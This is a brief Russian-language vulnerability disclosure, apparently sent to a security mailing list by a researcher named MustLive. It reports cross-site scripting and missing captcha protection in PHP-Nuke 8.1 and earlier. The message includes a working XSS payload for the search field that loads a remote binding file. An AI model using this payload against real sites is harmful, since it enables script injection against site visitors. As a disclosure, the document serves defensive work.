Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting та Insufficient Anti-automation уязвимостях в PHP-Nuke.
XSS (WASC-08):
POST запрос на странице http://site/modules.php?name=Search
" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')
В поле поиска.
Это версия для Mozilla и Firefox (до 3.0), используя MouseOverJacking можно сделать версию для всех браузеров.
Insufficient Anti-automation (WASC-21):
http://site/modules.php?name=Feedback
В форме нет защиты от автоматизированных запросов (капчи).
Уязвимы PHP-Nuke 8.1 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4645/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua